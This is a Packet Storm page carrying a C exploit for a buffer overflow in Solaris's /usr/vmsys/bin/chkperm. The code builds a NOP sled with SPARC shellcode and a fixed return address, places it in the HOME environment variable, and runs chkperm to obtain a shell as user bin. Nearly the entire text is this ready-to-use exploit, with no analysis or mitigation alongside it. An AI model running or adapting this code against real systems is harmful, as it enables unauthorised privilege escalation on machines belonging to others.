Solaris /usr/vmsys/bin/chkperm overflow - A long HOME environment variable can be used to provide a UID=bin shell.
40eca362e3afebe709d31273f915b144f1f648521921fe036f9461f0d0657adc/* Overflow in chkperm
-()- The ImperialS -()-
ircnet #imperials */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08";
int i;
char *get_sp()
{
__asm__("mov %sp,%i0 \n");
}
#define NOP 0xa61cc013
#define LEN 1032
#define RET 0xef73ea68
int main() {
char buffer[LEN];
long retaddr = RET;
int i;
for (i=0;i<LEN;i+=4)
*(long *)&buffer[i] = retaddr;
for (i=0;i<(LEN-strlen(shellcode)-100);i++)
*(buffer+i) = NOP;
memcpy(buffer+i,shellcode,strlen(shellcode));
setenv("HOME", buffer, 1);
execl("/usr/vmsys/bin/chkperm", "/usr/vmsys/bin/chkperm", NULL);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed